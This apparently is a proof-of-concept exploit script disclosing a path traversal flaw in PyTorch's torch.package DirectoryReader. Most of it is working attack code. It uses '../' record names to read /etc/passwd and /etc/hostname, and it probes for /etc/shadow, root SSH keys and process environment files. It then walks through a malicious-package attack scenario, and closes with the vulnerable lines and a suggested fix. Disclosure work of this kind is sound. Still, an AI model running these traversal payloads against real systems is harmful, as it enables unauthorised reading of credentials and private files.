poc-pytorch-dirreader / poc_dirreader_traversal.py
0xiviel's picture
Upload folder using huggingface_hub
b9770f5 verified
#!/usr/bin/env python3
"""
PoC: Path Traversal in DirectoryReader β€” Arbitrary File Read
Vulnerability: torch.package._directory_reader.DirectoryReader constructs file
paths by concatenating its base directory with unsanitized user/package-supplied
names. The get_record(), get_storage_from_record(), and has_record() methods
all use f-string path construction with NO validation:
def get_record(self, name):
filename = f"{self.directory}/{name}" # NO PATH VALIDATION
with open(filename, "rb") as f:
return f.read()
Path traversal via "../" sequences reads arbitrary files from the filesystem.
DirectoryReader is used by PackageImporter when loading unzipped torch.package
directories. A malicious package with crafted record names can read any file
accessible to the process (e.g., /etc/passwd, SSH keys, environment files).
Root cause: torch/package/_directory_reader.py:36, 41, 47
Tested: PyTorch 2.10.0+cpu on Python 3.13.11
"""
import os
import sys
import tempfile
import torch
from torch.package._directory_reader import DirectoryReader
def demonstrate_direct_traversal():
"""Demonstrate path traversal via DirectoryReader.get_record()."""
print()
print("=" * 70)
print(" Part 1: Direct Path Traversal via get_record()")
print("=" * 70)
print()
# Create a temporary directory to use as the package base
tmpdir = tempfile.mkdtemp(prefix="pkg_")
reader = DirectoryReader(tmpdir)
print(f" DirectoryReader base: {tmpdir}")
print()
# Demonstrate path traversal to read /etc/passwd
traversal_path = "../../../../etc/passwd"
resolved = os.path.normpath(f"{tmpdir}/{traversal_path}")
print(f" get_record('{traversal_path}')")
print(f" Resolves to: {resolved}")
print()
try:
data = reader.get_record(traversal_path)
content = data.decode("utf-8", errors="replace")
lines = content.strip().split("\n")
print(f" [+] SUCCESS β€” Read {len(data)} bytes from /etc/passwd")
print(f" [+] Lines: {len(lines)}")
print()
# Show first few lines as proof
print(" Contents (first 5 lines):")
for line in lines[:5]:
print(f" {line}")
print()
return True
except FileNotFoundError:
print(" [-] File not found (expected on some systems)")
return False
except Exception as e:
print(f" [-] Error: {type(e).__name__}: {e}")
return False
def demonstrate_has_record_traversal():
"""Demonstrate path traversal via has_record() for filesystem probing."""
print()
print("=" * 70)
print(" Part 2: Filesystem Probing via has_record()")
print("=" * 70)
print()
tmpdir = tempfile.mkdtemp(prefix="pkg_")
reader = DirectoryReader(tmpdir)
print(f" DirectoryReader base: {tmpdir}")
print()
# Probe for sensitive files
probes = [
("../../../../etc/passwd", "System users"),
("../../../../etc/shadow", "Password hashes (needs root)"),
("../../../../etc/hostname", "Hostname"),
("../../../../root/.ssh/id_rsa", "Root SSH key"),
("../../../../root/.bashrc", "Root bashrc"),
("../../../../proc/self/environ", "Process environment"),
]
print(" Probing for sensitive files via has_record():")
print()
found_count = 0
for path, desc in probes:
exists = reader.has_record(path)
status = "EXISTS" if exists else "not found"
if exists:
found_count += 1
print(f" has_record('{path}'): {status} ({desc})")
print()
print(f" [+] Found {found_count} files via path traversal probing")
return found_count > 0
def demonstrate_storage_traversal():
"""Demonstrate path traversal via get_storage_from_record()."""
print()
print("=" * 70)
print(" Part 3: File Read via get_storage_from_record()")
print("=" * 70)
print()
tmpdir = tempfile.mkdtemp(prefix="pkg_")
reader = DirectoryReader(tmpdir)
print(f" DirectoryReader base: {tmpdir}")
print()
# Read /etc/hostname as a storage (raw bytes)
traversal_path = "../../../../etc/hostname"
resolved = os.path.normpath(f"{tmpdir}/{traversal_path}")
print(f" get_storage_from_record('{traversal_path}', ...)")
print(f" Resolves to: {resolved}")
print()
try:
# Read as uint8 storage
result = reader.get_storage_from_record(
traversal_path, 256, torch.uint8
)
storage = result.storage()
data = bytes(storage[:storage.nbytes()])
content = data.rstrip(b'\x00').decode('utf-8', errors='replace').strip()
print(f" [+] SUCCESS β€” Read {len(data)} bytes via storage API")
print(f" [+] Content: {content}")
print()
return True
except FileNotFoundError:
print(f" [-] File not found")
return False
except Exception as e:
print(f" [-] Error: {type(e).__name__}: {e}")
return False
def demonstrate_package_importer_scenario():
"""Show realistic attack: malicious unzipped package reads /etc/passwd."""
print()
print("=" * 70)
print(" Part 4: Realistic Attack β€” Malicious Unzipped Package")
print("=" * 70)
print()
# Create a minimal unzipped package directory
tmpdir = tempfile.mkdtemp(prefix="malicious_pkg_")
os.makedirs(os.path.join(tmpdir, ".data"), exist_ok=True)
# extern_modules file (required by PackageImporter)
with open(os.path.join(tmpdir, ".data", "extern_modules"), "w") as f:
f.write("")
print(f" Created fake unzipped package: {tmpdir}")
print()
print(" Attack scenario:")
print(" 1. Attacker creates a malicious unzipped torch.package directory")
print(" 2. Package pickle references records with ../ traversal paths")
print(" 3. Victim loads package with PackageImporter(directory)")
print(" 4. PackageImporter creates DirectoryReader(directory)")
print(" 5. DirectoryReader.get_record() reads files outside the package")
print()
# Show that DirectoryReader is created for directories
from torch.package._directory_reader import DirectoryReader
reader = DirectoryReader(tmpdir)
# Demonstrate the traversal
try:
data = reader.get_record("../../../../etc/passwd")
lines = data.decode("utf-8", errors="replace").strip().split("\n")
print(f" [+] DirectoryReader read /etc/passwd: {len(lines)} lines")
return True
except Exception as e:
print(f" [-] Error: {e}")
return False
def demonstrate_vulnerability_pattern():
"""Show the vulnerable code."""
print()
print("=" * 70)
print(" Part 5: Vulnerability Details")
print("=" * 70)
print()
print(" All three methods are vulnerable (_directory_reader.py:35-48):")
print()
print(" def get_record(self, name): # line 35")
print(" filename = f\"{self.directory}/{name}\" # NO VALIDATION")
print(" with open(filename, \"rb\") as f:")
print(" return f.read()")
print()
print(" def get_storage_from_record(self, name, numel, dtype): # line 40")
print(" filename = f\"{self.directory}/{name}\" # NO VALIDATION")
print(" ...")
print(" return _HasStorage(storage.from_file(filename=filename, ...))")
print()
print(" def has_record(self, path): # line 46")
print(" full_path = os.path.join(self.directory, path) # NO VALIDATION")
print(" return os.path.isfile(full_path)")
print()
print(" FIX: Validate that the resolved path stays within self.directory:")
print(" ─────────────────────────────────────────────────────────")
print(" def _safe_path(self, name):")
print(" full = os.path.realpath(os.path.join(self.directory, name))")
print(" base = os.path.realpath(self.directory)")
print(" if not full.startswith(base + os.sep):")
print(" raise ValueError(f'Path traversal: {name}')")
print(" return full")
print()
def main():
print()
print(" PoC: DirectoryReader Path Traversal β†’ Arbitrary File Read")
print(f" PyTorch {torch.__version__}, Python {sys.version.split()[0]}")
print()
# Part 1: Direct traversal
read_ok = demonstrate_direct_traversal()
# Part 2: Filesystem probing
probe_ok = demonstrate_has_record_traversal()
# Part 3: Storage read
storage_ok = demonstrate_storage_traversal()
# Part 4: Realistic scenario
scenario_ok = demonstrate_package_importer_scenario()
# Part 5: Vulnerability details
demonstrate_vulnerability_pattern()
# Summary
print("=" * 70)
print(" RESULTS:")
if read_ok:
print(" [+] get_record(): Read /etc/passwd via path traversal")
if probe_ok:
print(" [+] has_record(): Probed filesystem for sensitive files")
if storage_ok:
print(" [+] get_storage_from_record(): Read file via storage API")
if scenario_ok:
print(" [+] Realistic scenario: Malicious package reads /etc/passwd")
print(" [+] Root cause: no path validation in DirectoryReader methods")
print(" [+] Fix: validate resolved path stays within base directory")
print("=" * 70)
if __name__ == "__main__":
main()